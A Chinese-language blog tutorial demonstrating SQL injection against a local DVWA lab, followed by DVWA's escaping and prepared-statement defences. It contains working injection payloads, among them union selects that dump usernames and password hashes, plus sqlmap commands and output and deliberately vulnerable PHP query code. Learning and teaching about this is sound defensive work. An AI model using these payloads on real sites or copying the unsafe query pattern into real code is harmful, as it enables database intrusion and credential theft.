算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmap,sql注入漏洞的防御
2022找工作是学历、能力和运气的超强结合体,遇到寒冬,大厂不招人,可能很多算法学生都得去找开发,测开
测开的话,你就得学数据库,sql,oracle,尤其sql要学,当然,像很多金融企业、安全机构啥的,他们必须要用oracle数据库
这oracle比sql安全,强大多了,所以你需要学习,最重要的,你要是考网络警察公务员,这玩意你不会就别去报名了,耽误时间!
考网警特招必然要考操作系统,计算机网络,计算机网络安全基础知识,由于备考时间不长,你可能需要速成,我就想办法自学速成了,课程太长没法玩
系列文章:
【1】计算机网络安全基础知识1:渗透测试,网络连接的核心TCP/IP体系结构,公网,内网,ip地址和端口
【2】计算机网络安全基础知识2:http超文本传输协议,请求request消息的get和post,响应response消息的格式,响应状态码
【3】计算机网络安全基础知识3:网站漏洞,安装phpstudy,安装靶场漏洞DVWA,搭建一个网站
【4】计算机网络安全基础知识4:命令执行漏洞,危害极大,DVWA演示命令注入漏洞攻击网站,防御命令注入执行漏洞,low,medium,high,impossible
文章目录
- 算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmap,sql注入漏洞的防御
- @[TOC](文章目录)
- 计算机网络安全基础知识:sql注入漏洞攻击
- sql注入漏洞被攻击的过程
- DVWA演示sql注入漏洞,判断是否存在sql注入漏洞
- 怎么样去利用sql注入漏洞
- sqlmap把复杂的利用过程自动化利用起来
- sql注入漏洞的防御
- 总结
文章目录
- 算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmap,sql注入漏洞的防御
- @[TOC](文章目录)
- 计算机网络安全基础知识:sql注入漏洞攻击
- sql注入漏洞被攻击的过程
- DVWA演示sql注入漏洞,判断是否存在sql注入漏洞
- 怎么样去利用sql注入漏洞
- sqlmap把复杂的利用过程自动化利用起来
- sql注入漏洞的防御
- 总结
计算机网络安全基础知识:sql注入漏洞攻击
千万别对正常互联网的网站发起攻击,这是违法犯罪哦!!!!!
sql注入漏洞
下面慢慢解释
SQL是数据库语言
操作数据库的
任何技术,前端展示,后端存储,都会调用数据库
用sql语言来搞
这课程我在oracle数据库系列课程中讲得很清楚了,有兴趣看看
不学也行
随你
sql注入漏洞被攻击的过程
咱们平时访问美团啥的,数据都是在他们数据库中,你访问可以查看
这跟命令注入类似
这里只不过不是PHP
这里是sql语言实现的
这是sql语句,骚操作,我不多说,你反正知道它就是查询叫长津湖的电影票房
咱们加入排序结果的语句
相当于你可以往命令里面注入sql新语句
这就是sql注入,如果这个命令非常恐怖,那???????????gggg
即,能改变原有sql语句的漏洞,就是sql注入漏洞
DVWA演示sql注入漏洞,判断是否存在sql注入漏洞
先设置安全级别low
这时,你可以模拟攻击了
咱们输入
看看源代码
SQL Injection Source
vulnerabilities/sqli/source/low.php
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
mysqli_close($GLOBALS["___mysqli_ston"]);
break;
case SQLITE:
global $sqlite_db_connection;
#$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);
#$sqlite_db_connection->enableExceptions(true);
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
#print $query;
try {
$results = $sqlite_db_connection->query($query);
} catch (Exception $e) {
echo 'Caught exception: ' . $e->getMessage();
exit();
}
if ($results) {
while ($row = $results->fetchArray()) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
} else {
echo "Error in fetch ".$sqlite_db->lastErrorMsg();
}
break;
}
}
?>
核心就是这:
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
含义:查询users表中,id的姓名
这就是后台的代码了
我们简单这么写,更改sql语句
// Check database
SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#;
判断1是否等于1吗?,true,肯定对的
#得目的是删除后续的字符
懂?
好,你这个and之后1=1就是黑客注入的sql语句了
我们去看看攻击
1' and 1=1#
再来改
1' and 1=2#
当1=2时,不成功,没有返回的
说明什么???
黑客利用这个漏洞,真的改了这个语句了,你咋找都没有结果,是不是很狗????
刚刚的骚操作,就意味着存在sql注入
懂????
因为你的sql代码可以被黑客修改,屌了吧???
怎么样去利用sql注入漏洞
1' order by 1#
1' order by 2#
1' order by 3#
你发现通过这种order by,看看是不是能把第一列,第二列,第n列给排序
这样就能查出数据库,它只存在两个列
没有别的列了哦
懂????
加这句话
1' union select user(),database()#
俩结果
分别是俩函数的
root@localhost是**user()的结果,返回了,当前连接了root用户
dvwa是database()**的结果,证明当前网站连接的数据库名字是dvwa
懂?
这很简单的,利用sql注入,可以查询用户名和数据库名字
咱还能查它有哪些表格
1' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'#
information_schema保存了数据库的名称,和数据库的表名称
貌似我这失败了,难道DVWA它改了吗?????
干脆直接读取user表算了
据说是出现了俩
我们就直接去搞这个users,看看它的用户私密信息
瞅瞅
1' union select user,password from users#
还真的能查到
select first_name,last_name from users where user_id='1' union select user,password from users#
成功读取了这个玩意
就上面这句话搞定
sqlmap把复杂的利用过程自动化利用起来
它有代码,可以帮你尝试暴力检查sql注入漏洞
你不用自己写代码
https://sqlmap.org/
然后运行它
完事咱们要运行命令去检测这个网址,带上cookie
cookie是
告诉sqlmap,我已经登录
按F12进入开发者模式
然后看网络,刷新重新载入记录
我一直没找到cookie
gg
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#"
-u:检测的网址url:http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#
我没找到cookie直接运行上面的命令
D:\software\phpstudy\sqlmap>python sqlmap.py -upython sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1%27+and+1%3D1%23&Submit=Submit#"
___
__H__
___ ___[.]_____ ___ ___ {1.7.2.22#dev}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:02:19 /2023-03-04/
[14:02:19] [WARNING] it appears that you have provided tainted parameter values ('id=1' and 1%3D1#') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[14:02:21] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=6ari01ceq6l...m6s52currv;security=impossible'). Do you want to use those [Y/n] y
[14:02:23] [INFO] testing if the target URL content is stable
[14:02:23] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[14:02:28] [INFO] testing if GET parameter 'id' is dynamic
[14:02:28] [WARNING] GET parameter 'id' does not appear to be dynamic
[14:02:28] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[14:02:28] [INFO] testing for SQL injection on GET parameter 'id'
[14:02:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:02:29] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:02:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:02:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:02:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[14:02:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:02:29] [INFO] testing 'Generic inline queries'
[14:02:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[14:02:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[14:02:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[14:02:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:02:30] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[14:02:30] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[14:02:30] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[14:02:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:02:32] [WARNING] GET parameter 'id' does not seem to be injectable
[14:02:32] [INFO] testing if GET parameter 'Submit' is dynamic
[14:02:32] [WARNING] GET parameter 'Submit' does not appear to be dynamic
[14:02:32] [WARNING] heuristic (basic) test shows that GET parameter 'Submit' might not be injectable
[14:02:32] [INFO] testing for SQL injection on GET parameter 'Submit'
[14:02:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:02:33] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:02:33] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:02:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:02:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[14:02:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:02:33] [INFO] testing 'Generic inline queries'
[14:02:33] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[14:02:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[14:02:34] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[14:02:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:02:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[14:02:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[14:02:34] [INFO] testing 'Oracle AND time-based blind'
[14:02:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:02:34] [WARNING] GET parameter 'Submit' does not seem to be injectable
[14:02:34] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 14:02:34 /2023-03-04/
你看看
它貌似没有楼栋
不知道哦
python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --dbs
你想获取数据库的名字
-D
想象获取它的表名
就OK了
手工注入查询也行的
这个是sqlmap搞的
继续获取列名
反正你还是黑到了
手工注入时,加密的密码,反正
好,我们看
sql注入漏洞的防御
你不是执行select,后面的语句给你过滤
gg
不要输入别的sql语句
调高安全级别
SQL Injection Source
vulnerabilities/sqli/source/medium.php
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
switch ($_DVWA['SQLI_DB']) {
case MYSQL:
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
break;
case SQLITE:
global $sqlite_db_connection;
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
#print $query;
try {
$results = $sqlite_db_connection->query($query);
} catch (Exception $e) {
echo 'Caught exception: ' . $e->getMessage();
exit();
}
if ($results) {
while ($row = $results->fetchArray()) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
} else {
echo "Error in fetch ".$sqlite_db->lastErrorMsg();
}
break;
}
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>
转义字符串中的特殊字符
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
给每个单引号,都给加了反斜杠,骚啊
gg
这个可就不是sql语句了
你也没法注入生气了语句去注入漏洞了
还能继续解决
看看high呢
在后面改了限制
SQL Injection Source
vulnerabilities/sqli/source/high.php
<?php
if( isset( $_SESSION [ 'id' ] ) ) {
// Get input
$id = $_SESSION[ 'id' ];
switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
break;
case SQLITE:
global $sqlite_db_connection;
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
#print $query;
try {
$results = $sqlite_db_connection->query($query);
} catch (Exception $e) {
echo 'Caught exception: ' . $e->getMessage();
exit();
}
if ($results) {
while ($row = $results->fetchArray()) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
} else {
echo "Error in fetch ".$sqlite_db->lastErrorMsg();
}
break;
}
}
?>
对sql语句进行限制,很骚啊
这有问题
再来看impossible
SQL Injection Source
vulnerabilities/sqli/source/impossible.php
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
$id = intval ($id);
switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
$row = $data->fetch();
// Make sure only 1 result is returned
if( $data->rowCount() == 1 ) {
// Get values
$first = $row[ 'first_name' ];
$last = $row[ 'last_name' ];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
break;
case SQLITE:
global $sqlite_db_connection;
$stmt = $sqlite_db_connection->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1;' );
$stmt->bindValue(':id',$id,SQLITE3_INTEGER);
$result = $stmt->execute();
$result->finalize();
if ($result !== false) {
// There is no way to get the number of rows returned
// This checks the number of columns (not rows) just
// as a precaution, but it won't stop someone dumping
// multiple rows and viewing them one at a time.
$num_columns = $result->numColumns();
if ($num_columns == 2) {
$row = $result->fetchArray();
// Get values
$first = $row[ 'first_name' ];
$last = $row[ 'last_name' ];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
break;
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
is_numeric判断是否为数字
PDO预处理
最后才放id
避免其他生气了语句产生
总结
提示:重要经验:
1)
2)学好oracle,操作系统,计算机网络,即使经济寒冬,整个测开offer绝对不是问题!同时也是你考公网络警察的必经之路。
3)笔试求AC,可以不考虑空间复杂度,但是面试既要考虑时间复杂度最优,也要考虑空间复杂度最优。
![[学习笔记]黑马程序员Spark全套视频教程,4天spark3.2快速入门到精通,基于Python语言的spark教程](https://img-blog.csdnimg.cn/img_convert/803b59e25db6790514020005607041aa.png)
